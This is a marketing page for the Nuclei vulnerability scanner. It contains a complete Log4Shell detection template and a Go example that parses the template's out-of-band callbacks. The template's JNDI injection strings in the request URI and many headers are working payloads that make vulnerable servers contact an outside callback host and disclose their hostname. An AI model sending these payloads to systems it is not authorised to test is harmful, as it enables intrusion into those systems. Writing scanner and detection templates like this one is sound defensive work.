Effective vulnerability management starts with a better scanner

Nuclei detects exploitable vulnerabilities across every asset, so you can fix what matters without the noise.


Trusted by 100k+ security professionals

How ProjectDiscovery solves vulnerability management

Real, actionable findings that an attacker could exploit

Streamlined prioritization without false positives

Broadest coverage for all security risks, not just CVEs

Accelerated remediation with automated ticketing

• Fewer vulnerabilities from false positives: 97%
• Manual triage time saved per incident: 24 hours
• Detection templates for real security risks: 11,000+
• Faster exploit coverage than traditional scanners: 10x

Nuclei validates exploitability at runtime

Traditional vulnerability scanners like Tenable, Qualys, and Rapid7 rely on outdated techniques like version fingerprinting and static signatures. These rigid, black-box tools overwhelm teams with false positives and blind spots.

Direct behavioral checks

Support for complex request flows including value extraction and reuse, pipelining, request tampering, race conditions, and raw request crafting—enabling real-world attack simulation at scale.

Smart validation logic

Use flexible matchers to validate responses with precision—status codes, regex patterns, binary data, XPath, and more. Matchers are the core of Nuclei’s signal-over-noise approach to vulnerability detection.

Multi-protocol support

Nuclei goes beyond traditional web scanning, with support for DNS, TCP, headless browsers, and more. Templates can be run with or without authentication to test real-world attack paths anywhere in your environment.

Apache Log4j2 Remote Code Injection

id: CVE-2021-44228

info:
  name: Apache Log4j2 Remote Code Injection
  author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba,Tea,j4vaovo
  severity: critical
  description: |
    Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.
    An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution, potentially compromising the affected system.
  remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).
  reference:
    - https://logging.apache.org/log4j/2.x/security.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
    - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
    - https://www.lunasec.io/docs/blog/log4j-zero-day/
    - https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2021-44228
    cwe-id: CWE-20,CWE-917
    epss-score: 0.94381
    epss-percentile: 0.99959
    cpe: cpe:2.3:o:siemens:6bk1602-0aa12-0tp0_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: siemens
    product: 6bk1602-0aa12-0tp0_firmware
  tags: cve2021,cve,rce,oast,log4j,injection,kev,apache
variables:
  rand1: '{{rand_int(111, 999)}}'
  rand2: '{{rand_int(111, 999)}}'
http:
  - raw:
      - |
        GET /?x=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1
        Host: {{Hostname}}
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}}
        Accept-Encoding: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptencoding.{{interactsh-url}}}
        Accept-Language: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptlanguage.{{interactsh-url}}}
        Access-Control-Request-Headers: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}
        Access-Control-Request-Method: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}
        Authentication: Basic ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbasic.{{interactsh-url}}}
        Authentication: Bearer ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbearer.{{interactsh-url}}}
        Cookie: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookievalue.{{interactsh-url}}}
        Location: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.location.{{interactsh-url}}}
        Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.origin.{{interactsh-url}}}
        Referer: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.referer.{{interactsh-url}}}
        Upgrade-Insecure-Requests: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}
        User-Agent: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.useragent.{{interactsh-url}}}
        X-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}}
        X-CSRF-Token: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xcsrftoken.{{interactsh-url}}}
        X-Druid-Comment: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xdruidcomment.{{interactsh-url}}}
        X-Forwarded-For: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xforwardedfor.{{interactsh-url}}}
        X-Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xorigin.{{interactsh-url}}}
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
      - type: regex
        part: interactsh_request
        regex:
          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
    extractors:
      - type: kval
        kval:
      - type: regex
        group: 2
        regex:
          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
        part: interactsh_request
      - type: regex
        group: 1
        regex:
          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
        part: interactsh_request
# digest: 4a0a0047304502202884fb76d02d44ae24b3e9bc5914a20e89726f929f3a1472cb9ce81e16f6c7320221009fb4e79fd5e58f4a49ccbeff467c990c3be6e32a7e03a2af8db207849e937d5f:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502204ecff69d0cf6eff10fa830187e3bb11859e75c1901f1be914ec81bc02e7a9d8b02210097c7eec83c3c4e92ced242dcf77aeba969817fd0c9306fbc099450473f23d99a:922c64590222798bb761d5b6d8e72950

Nuclei templates are designed to run safely at scale. Each template is individually tested and reviewed by our team.
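How the template's two matchers and its regex extractors treat a callback record when a finding is triaged, as an added example in Go (not ProjectDiscovery's code). The `Interaction` and `Finding` types, the `Evaluate` function and the `oastsrv.test` domain are assumptions made for illustration, and the sample records are constructed.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Pattern copied from the template's regex matcher and regex extractors.
var callbackRe = regexp.MustCompile(
	`\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+`)

// Interaction is a hypothetical, simplified out-of-band callback record.
type Interaction struct {
	Protocol string // checked by the word matcher (part: interactsh_protocol)
	Request  string // checked by the regex matcher (part: interactsh_request)
}

// Finding holds what the two regex extractors pull out of the callback name.
type Finding struct {
	Host  string // group 1: the value the target put in place of ${hostName}
	Field string // group 2: label naming the injected URI or header
}

// Evaluate mirrors "matchers-condition: and": both matchers must succeed.
func Evaluate(i Interaction) (Finding, bool) {
	if !strings.Contains(i.Protocol, "dns") {
		return Finding{}, false
	}
	m := callbackRe.FindStringSubmatch(i.Request)
	if m == nil {
		return Finding{}, false
	}
	return Finding{Host: m[1], Field: m[2]}, true
}

func main() {
	// Constructed records; oastsrv.test stands in for the callback domain.
	samples := []Interaction{
		{"dns", "123456.web01.useragent.c0ffee01.oastsrv.test"},
		{"dns", "654321.app.corp.lan.uri.c0ffee01.oastsrv.test"}, // dotted host
		{"http", "123456.web01.useragent.c0ffee01.oastsrv.test"}, // wrong protocol
		{"dns", "c0ffee01.oastsrv.test"},                         // no marker
	}
	for _, s := range samples {
		f, ok := Evaluate(s)
		fmt.Printf("%-5s match=%-5v host=%q field=%q\n", s.Protocol, ok, f.Host, f.Field)
	}
}
```

Group 1 is greedy and allows dots, so a multi-label host name is captured whole while the last four labels are reserved for the field name and the callback domain.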

Faster detection. Faster protection.

ProjectDiscovery responds to critical vulnerabilities faster than legacy scanners.

CVE-2025-1974

IngressNightmare

A security issue was discovered in Kubernetes where under certain conditions, an unauthenticated attacker with access to the pod network can achieve arbitrary code execution in the context of the ingress-nginx controller. This can lead to disclosure of Secrets accessible to the controller. (Note that in the default installation, the controller can access all Secrets cluster-wide.)

Time to detection

• ProjectDiscovery: 5 hrs

• Legacy scanners: 2-5 days

  1. Public advisory & patch release

    Kubernetes and Wiz Research publicly disclosed CVE-2025-1974 and released patched Ingress NGINX versions 1.12.1 and 1.11.5.

  2. ProjectDiscovery publishes internal detection template

    A Nuclei template for internal network scanning of CVE-2025-1974 was released, enabling detection within private infrastructures.

    • Realtime automated scans triggered

    • Remediation workflows initiated

  3. Qualys publishes upgrade advisory

    Qualys released a blog post recommending users upgrade their Ingress NGINX controller to the patched versions to mitigate CVE-2025-1974.

  4. ProjectDiscovery publishes external detection template

    A Nuclei template for external scanning was released, allowing detection of CVE-2025-1974 from outside target networks.

    • External scanning available

  5. Rapid7 releases Cluster Scanner plugin

    Rapid7 launched the Kubernetes Cluster Scanner plugin with checks for CVE-2025-1974, enabling customers to validate patch status across their clusters.

  6. Tenable releases Nessus plugin #233656

    Tenable published a direct remote check plugin for Nessus, allowing automated scanning for CVE-2025-1974 on target systems.

  7. Scan for CVE-2025-1974

The vulnerability management lifecycle, reimagined

We're rethinking every step of the vulnerability management lifecycle to help teams detect more actionable findings and fix what actually matters.

Scope

Discover everything

We combine external recon and internal network discovery to build a complete, unified asset inventory

Scan

Detect real exploits

Nuclei validates exploitability at runtime to provide real, actionable results

Prioritize

Focus on what matters

Prioritize high-impact findings based on asset context like ownership, criticality, and exposure

Remediate

Fix risks faster

Create Jira tickets with a single click and validate fixes with instant retest

Monitor

Ensure vulnerabilities stay fixed

Automated regressions and continuous monitoring to ensure risks don't re-appear

ProjectDiscovery vs Traditional scanners

See how our modern approach to vulnerability management outperforms traditional solutions

Detection accuracy

Detects real, exploitable vulnerabilities (ProjectDiscovery)

Direct behavioral checks validate exploitability at runtime to eliminate false positives.

Noise and false positives (Traditional VM)

Version-based checks create alert fatigue and waste triage time.

Detection coverage

Broadest coverage for real security risks (ProjectDiscovery)

Over 11,000 detection templates covering the most exploited vulnerabilities on the internet.

CVE-based detections only (Traditional VM)

Detections only for known CVEs, which misses critical misconfigurations and other actively exploited security risks.

Time to detection

Real-time intelligence (ProjectDiscovery)

Rapid detection response from a global security community and ProjectDiscovery’s research team.

Delayed and opaque (Traditional VM)

Relies on commercial vendor updates that are slow and inaccurate.

Risk prioritization

Context-aware scoring (ProjectDiscovery)

Exploitability + asset context drastically reduce triage time.

Static severity scores (Traditional VM)

Relies on CVSS without real-world context or validation.

Customization

Adaptable and extensible templates (ProjectDiscovery)

Customize and write your own detection templates.

Rigid and black box (Traditional VM)

Limited to vendor-defined scanning capabilities without modification.

Target scope

Automated discovery with cloud integrations (ProjectDiscovery)

External and internal recon plus cloud integrations offer broadest coverage.

Bring your own assets (Traditional VM)

Lacks robust discovery capabilities, creating gaps in scope and coverage.

Real-time asset visibility kept their perimeter audit-ready

Scanned 14,500 assets in under 5 minutes during a critical CVE

Validated fixes instantly with one-click retests

Cut response noise by escalating only when necessary

Turned bug bounty findings into reusable detections

Featured stories

The latest in open source tools, recent exploits, Nuclei templates, and more.